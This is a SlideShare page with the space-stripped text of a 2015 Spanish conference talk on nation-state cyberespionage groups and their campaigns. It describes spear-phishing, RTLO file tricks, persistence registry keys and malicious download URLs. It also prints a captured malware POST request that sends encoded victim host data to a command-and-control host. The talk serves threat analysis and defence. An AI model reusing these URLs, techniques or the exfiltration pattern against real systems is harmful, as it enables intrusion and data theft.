SlideShare une entreprise Scribd logo
1  sur  44
Télécharger pour lire hors ligne
CyberespionajedeNaciones
#PeruHack2015
MauricioVelazco
@mvelazco
#whoami
▪ SecurityGeek(6+anhos)
▪ BlueTeam:GestiondeVulns,RespuestaaIncidentes,
ThreatIntelligence,etc.
▪ ThreatHunting
▪ AlgunasCerts:
OCSP,CEH,CPTE,ECSA
▪ @mvelazco
Cyber Espionaje
▪ Elusodeataquesinformaticosparaobteneraccesoa
informacionconfidencialoconfinesdesabotaje.
▪ Tipicamentellevadoacaboporungobierno;bien
estructuradoyconaccesoarecursos~ilimitados
▪ APT(AdvancedPersistentThreat)
Stuxnet - Agosto 2010
▪ Operacion“OlympicGames”
▪ EEEUeIsrael
▪ Objetivo:afectarelenriquicimientodeUranioenlacentral
nucleardeNatanz,Iran
▪ Exploto4 Zero Days
▪ Limahack2011
APT 1 Report – Febrero 2013
http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
Mayo 2014
Post Snowden
Junio 2013
OPM – Junio 2015
Hacking Team – Julio 2015
Cómo lo hacen ?
The Cyber Kill Chain
Intelligence-Driven Computer Network
Defense Informed by Analysis of Adversary
Campaigns and Intrusion Kill Chains
Lockheed Martin, 2011
RSA - 2011
Analisis Tecnico
Dark Hotel Team
▪ GrupodecyberespionajeconnexosaCoreadelSuractivo
desdeel2010.
▪ Enfocadoencomprometerorganizacionesasociadascon
diplomacia,politicainternacional,seguridad&defensa.
▪ Gobiernosatacadosincluyen:Japon,Taiwan,China,Rusia,
TailandiayUSA.
Dark Hotel Team – TTPs
▪ Correos“SpearPhishing”utilizandotemasdeinterespara
lasvictimas
▪ Hautilizadovulnerabilidades0day
▪ CVE-2014-0497yCVE-2009-4324
▪ Troyanohechoamedida:Tapaoux
▪ MetodosdeInfeccion
▪ BinariosconRight-to-leftoverride(RTLO)
▪ ArchivosHTA
▪ Macrosembebidas
▪ ScriptsJavascript
Dark Hotel Team – TTPs
▪ RTLOesuncaracterUnicode(U+202e)diseñadopara
soportarlenguajesqueseescribendederechaaizquierda.
▪ Estecaracterpuedeserabusadoparahacercreerque
archivosmaliciososnoloson.
Dark Hotel Team – TTPs
Dark Hotel Team – Campanha #1
▪ SpearPhishingconunarchivoraratachadoquecontiene
unbinarioutilizandoRTLO:letter_rcs.jpg.
▪ Alejecutarse,elbinarioescribe:
▪ letter_rcs.jpg–Imageninocua
▪ u.js–ScriptJavascriptmalicioso
▪ EnWindows,pordefecto,abrirunarchivoconextension
.JSinvoca Windowsscriptinghost(WSH). a
wscript.exe
Dark Hotel Team – Campanha #1
Dark Hotel Team – Campanha #1
▪ U.jsdescargayejecutaotroJavscriptde
hxxp://xxx.info/decod9/unzip.js
▪ Unzip.jsdescarga
hxxp://xxx.info/open99/office32loguardaen
%TEMP%csrtsrm.exe yloejecuta(payload)
▪ Eltroyanodescargaotrosmodulosconelfindeexfiltracion
▪ Keylogger
%APPDATA%MicrosoftWindowssystem64srmsr.exe
▪ DocumentScrapping
%APPDATA%MicrosoftWindowssystem64xsrmsd.exe
Dark Hotel Team – Campanha #1
▪ xsrmsd.exeencuentratodoslos.doc, .pdf, .xls, .txty
creaunarchivocomprimidoconpassword
12345qwert!!
▪ Llave:HKEY_LOCAL_MACHINESOFTWAREMicrosoftActiveSetupInstalled
Components{50036903-7717-484a-9345-7AE5FF85DCE9}StubPath
Valor:%WINDIR%system32csntzjy.exe
%APPDATA%MicrosoftWindowsExplorercsntzjy.exe
Dark Hotel Team – Campanha #2
▪ DarkHotelcomprometiolaseguridaddehotelesdelujoy
mantuvoaccesoparaserusadocuandoseanecesario.
▪ Losobjetivossonusualmentealtosejecutivosdedistintas
industriasconinteresesenlaregionasiatica.
▪ Alconectarsealareddelhotel,elobjetivorecibeun
mensajedeactualizaciondeGoogle Toolbar,Adobe
FlashoWindows Messenger.
▪ Kaspersky
Codoso Team
▪ ActivodesdeAbril2011;tienevinculosconChina.
▪ Conduceintrusionesderedcomosoporteparaunesfuerzo
decolecciondeinteligenciaglobal
▪ Verticalesafectadasincluyen
▪ Energia
▪ Finanzas
▪ Defenss
▪ Gobierno
▪ DisidentesPoliticos
Codoso Team - TTPs
▪ SpearPhishingemails
▪ Waterholing
▪ Hanutilizadovulnerabidades0day
▪ Troyanohechoamedida:Mad Hatter/Codoso
▪ Utilizancorreosseñueloscontemasrelacioadosa
problemasconChina,eventosmundialesypolitica
internacional.
Codoso Team – Campanha 1
▪ Ennoviembredel2014,Codosoinfectolaconocidaweb
forbes.com einyectouniframemalicioso:
http://74.207.254.87/83a08vkzvt/8hthrx.swf
▪ Elobjectivo:explotar2vulnerabilidades0dayenFlash
Player(CVE-2014-9163)eInternetExplorer9+
(CVE-2015-0071)
▪ SiesXPsoloseutilizaCVE-2014-9163,perosies
Vista+exploitatambienIEparabypasseasASLR
Codoso Team – Campanha 1
▪ Checks
Codoso Team – Campanha 1
▪ ElexploitdescargaunaDLL(wuservice.dll)ylacarga
en memoria.
▪ EstaDLLenumeraelequipoejecutandocomandosde
reconocimiento:systeminfo, ipconfig, tasklist.
▪ EnvialainformacionrecaudadaenelVIEWSTATEbase
64
▪ UnasegundaDLLcifradaconXOR(0x67)esdescargadae
inyectadaenmemoria.
Calc Team
▪ Activodesdeel2009,grupodeespionajeconnexosa
China.
▪ HistoricamentesusobjetivoshansidoTaiwanyUSAconel
finderecolectarinteligencia.
▪ Tecnicapreferida:Correoselectronicos+ingenieriasocial
utilizandosiempretemasdegeopolitica.
▪ Explotovulnerabilidadesyaparchadas
▪ Utiliza3“familias”demalware
Calc Team – Campanha 1
▪ Spearphishing,“G20 Briefing Paper.zip” que
contiene2binariosmaliciosos(.exe)
▪ G20DiscussionPaper.exe
▪ GPFIWorkPlan2013.exe
▪ LosbinariosescribenyabrenunarchivoPDFlegitimocon
elvisorpordefecto.
▪ Secopiaa%TEMP%, ycreaunallavederegistropara
serejecutadocuandoelequipoinicia (KeyLoggery
dropper)
▪ Alcopiarse,seejecutaconelparametro“again”ycontacta
astatus.acmetoy.com
Calc Team – Campanha 1
Calc Team – Campanha 1
Calc Team – Campanha 2
▪ Noviembre2015,APEC
▪ BriefingPaperonthePresident'sScheduleduringtheAPEC
LeadersMeeting.zip
▪ Hojadecalculo(.xls)conunmacroobfuscadoembebido.
▪ Escribe
▪ %TEMP%AELMEntertainmentbudgetandAttendanceallowance.xls
▪ %TEMP%1C234643A8A8.tmp–Scriptdelimpieza
▪ %TEMP%1C224643A8B8.js –MalwareenJS
▪ HKCUSoftwareMicrosoftWindowsCurrentVersionRun
network
Calc Team – Campanha 2
Calc Team – Campanha 2
Calc Team – Campanha 2
Calc Team – Campanha 2
▪ POST/common.phpHTTP/1.1
Content-Type:application/x-www-form-urlencoded
User-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;
Trident/5.0)
Referer:https://www.google.com
Content-Length:248
Accept:*/*
Host:presentation.twilightXXXXXX.com
Connection:Keep-Alive
action=aaa&data=NzQzMDFjYzNjOWVmOTBiNDIzZDdiNDI
0ZDI2NDNiMGZ8MTcyLjE2LjI1NS4yfFdJTFNPTk5FTEx
ZfFdJTFNPTk5FTExZXEFkbWluaXN0cmF0b3IoYWRta
W5pc3RyYXRvcil8TWljcm9zb2Z0IFdpbmRvd3MgWF
AgUHJvZmVzc2lvbmFsfDE3Mi4xNi4yNTUuMTo4ODg
4fGpzbmVbMS40XSxpbXB0LHByfA%3D%3D
Winnti Team
▪ Identificadoen2009
▪ Susataqueshansidoenfocadosalaindustriadejuegos
primariamentepararobarcertificadosdigitalesque
permitansoportenactividadesdecyberespionajeaotros
objetivos.
▪ Nexosconotrosgruposdeespionajeconloscuales
compartecertificadosdigitales
X Team
X Team
X Team
X Team
X Team
Conclusiones
▪ AdvancedPersistentThreat?
▪ ElCyberEsiponajecontinuaraimplementandocuanta
tecnicapuedasiempreycuandoseaefectiva
▪ Gruposdeespionajeorientalesutilizanlainformacion
recaudaparafortacelersuindustriainernamientrasque
occidentetieneotrosfines.
▪ Sudamerica?Peru?
CyberespionajedeNaciones
#PeruHack2015
MauricioVelazco
@mvelazco

Contenu connexe

Plus de Mauricio Velazco

PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaMauricio Velazco
 
Detection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdfDetection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdfMauricio Velazco
 
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsBlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsMauricio Velazco
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationMauricio Velazco
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksMauricio Velazco
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Mauricio Velazco
 
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue TeamBlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue TeamMauricio Velazco
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementMauricio Velazco
 
LimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuroLimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuroMauricio Velazco
 
PeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsPeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsMauricio Velazco
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxMauricio Velazco
 
Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?Mauricio Velazco
 
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...Mauricio Velazco
 
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...Mauricio Velazco
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Mauricio Velazco
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitMauricio Velazco
 
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...Mauricio Velazco
 

Plus de Mauricio Velazco (20)

PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
 
Detection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdfDetection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdf
 
BSides Panama 2022
BSides Panama 2022BSides Panama 2022
BSides Panama 2022
 
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsBlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
 
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue TeamBlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral Movement
 
LimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuroLimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuro
 
PeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsPeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos Windows
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/Linux
 
Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
 
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
 
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
 
Bsides Long Island 2019
Bsides Long Island 2019Bsides Long Island 2019
Bsides Long Island 2019
 
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
 

Dernier

Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxJOSEMANUELHERNANDEZH11
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudianteAndreaHuertas24
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIAWilbisVega
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 

Dernier (16)

Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptx
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 

Peruhack 2015 - Cyberespionaje de Naciones

  • 3. Cyber Espionaje ▪ Elusodeataquesinformaticosparaobteneraccesoa informacionconfidencialoconfinesdesabotaje. ▪ Tipicamentellevadoacaboporungobierno;bien estructuradoyconaccesoarecursos~ilimitados ▪ APT(AdvancedPersistentThreat)
  • 4. Stuxnet - Agosto 2010 ▪ Operacion“OlympicGames” ▪ EEEUeIsrael ▪ Objetivo:afectarelenriquicimientodeUranioenlacentral nucleardeNatanz,Iran ▪ Exploto4 Zero Days ▪ Limahack2011
  • 5. APT 1 Report – Febrero 2013 http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
  • 9. Hacking Team – Julio 2015
  • 11. The Cyber Kill Chain Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains Lockheed Martin, 2011
  • 14. Dark Hotel Team ▪ GrupodecyberespionajeconnexosaCoreadelSuractivo desdeel2010. ▪ Enfocadoencomprometerorganizacionesasociadascon diplomacia,politicainternacional,seguridad&defensa. ▪ Gobiernosatacadosincluyen:Japon,Taiwan,China,Rusia, TailandiayUSA.
  • 15. Dark Hotel Team – TTPs ▪ Correos“SpearPhishing”utilizandotemasdeinterespara lasvictimas ▪ Hautilizadovulnerabilidades0day ▪ CVE-2014-0497yCVE-2009-4324 ▪ Troyanohechoamedida:Tapaoux ▪ MetodosdeInfeccion ▪ BinariosconRight-to-leftoverride(RTLO) ▪ ArchivosHTA ▪ Macrosembebidas ▪ ScriptsJavascript
  • 16. Dark Hotel Team – TTPs ▪ RTLOesuncaracterUnicode(U+202e)diseñadopara soportarlenguajesqueseescribendederechaaizquierda. ▪ Estecaracterpuedeserabusadoparahacercreerque archivosmaliciososnoloson.
  • 17. Dark Hotel Team – TTPs
  • 18. Dark Hotel Team – Campanha #1 ▪ SpearPhishingconunarchivoraratachadoquecontiene unbinarioutilizandoRTLO:letter_rcs.jpg. ▪ Alejecutarse,elbinarioescribe: ▪ letter_rcs.jpg–Imageninocua ▪ u.js–ScriptJavascriptmalicioso ▪ EnWindows,pordefecto,abrirunarchivoconextension .JSinvoca Windowsscriptinghost(WSH). a wscript.exe
  • 19. Dark Hotel Team – Campanha #1
  • 20. Dark Hotel Team – Campanha #1 ▪ U.jsdescargayejecutaotroJavscriptde hxxp://xxx.info/decod9/unzip.js ▪ Unzip.jsdescarga hxxp://xxx.info/open99/office32loguardaen %TEMP%csrtsrm.exe yloejecuta(payload) ▪ Eltroyanodescargaotrosmodulosconelfindeexfiltracion ▪ Keylogger %APPDATA%MicrosoftWindowssystem64srmsr.exe ▪ DocumentScrapping %APPDATA%MicrosoftWindowssystem64xsrmsd.exe
  • 21. Dark Hotel Team – Campanha #1 ▪ xsrmsd.exeencuentratodoslos.doc, .pdf, .xls, .txty creaunarchivocomprimidoconpassword 12345qwert!! ▪ Llave:HKEY_LOCAL_MACHINESOFTWAREMicrosoftActiveSetupInstalled Components{50036903-7717-484a-9345-7AE5FF85DCE9}StubPath Valor:%WINDIR%system32csntzjy.exe %APPDATA%MicrosoftWindowsExplorercsntzjy.exe
  • 22. Dark Hotel Team – Campanha #2 ▪ DarkHotelcomprometiolaseguridaddehotelesdelujoy mantuvoaccesoparaserusadocuandoseanecesario. ▪ Losobjetivossonusualmentealtosejecutivosdedistintas industriasconinteresesenlaregionasiatica. ▪ Alconectarsealareddelhotel,elobjetivorecibeun mensajedeactualizaciondeGoogle Toolbar,Adobe FlashoWindows Messenger. ▪ Kaspersky
  • 23. Codoso Team ▪ ActivodesdeAbril2011;tienevinculosconChina. ▪ Conduceintrusionesderedcomosoporteparaunesfuerzo decolecciondeinteligenciaglobal ▪ Verticalesafectadasincluyen ▪ Energia ▪ Finanzas ▪ Defenss ▪ Gobierno ▪ DisidentesPoliticos
  • 24. Codoso Team - TTPs ▪ SpearPhishingemails ▪ Waterholing ▪ Hanutilizadovulnerabidades0day ▪ Troyanohechoamedida:Mad Hatter/Codoso ▪ Utilizancorreosseñueloscontemasrelacioadosa problemasconChina,eventosmundialesypolitica internacional.
  • 25. Codoso Team – Campanha 1 ▪ Ennoviembredel2014,Codosoinfectolaconocidaweb forbes.com einyectouniframemalicioso: http://74.207.254.87/83a08vkzvt/8hthrx.swf ▪ Elobjectivo:explotar2vulnerabilidades0dayenFlash Player(CVE-2014-9163)eInternetExplorer9+ (CVE-2015-0071) ▪ SiesXPsoloseutilizaCVE-2014-9163,perosies Vista+exploitatambienIEparabypasseasASLR
  • 26. Codoso Team – Campanha 1 ▪ Checks
  • 27. Codoso Team – Campanha 1 ▪ ElexploitdescargaunaDLL(wuservice.dll)ylacarga en memoria. ▪ EstaDLLenumeraelequipoejecutandocomandosde reconocimiento:systeminfo, ipconfig, tasklist. ▪ EnvialainformacionrecaudadaenelVIEWSTATEbase 64 ▪ UnasegundaDLLcifradaconXOR(0x67)esdescargadae inyectadaenmemoria.
  • 28. Calc Team ▪ Activodesdeel2009,grupodeespionajeconnexosa China. ▪ HistoricamentesusobjetivoshansidoTaiwanyUSAconel finderecolectarinteligencia. ▪ Tecnicapreferida:Correoselectronicos+ingenieriasocial utilizandosiempretemasdegeopolitica. ▪ Explotovulnerabilidadesyaparchadas ▪ Utiliza3“familias”demalware
  • 29. Calc Team – Campanha 1 ▪ Spearphishing,“G20 Briefing Paper.zip” que contiene2binariosmaliciosos(.exe) ▪ G20DiscussionPaper.exe ▪ GPFIWorkPlan2013.exe ▪ LosbinariosescribenyabrenunarchivoPDFlegitimocon elvisorpordefecto. ▪ Secopiaa%TEMP%, ycreaunallavederegistropara serejecutadocuandoelequipoinicia (KeyLoggery dropper) ▪ Alcopiarse,seejecutaconelparametro“again”ycontacta astatus.acmetoy.com
  • 30. Calc Team – Campanha 1
  • 31. Calc Team – Campanha 1
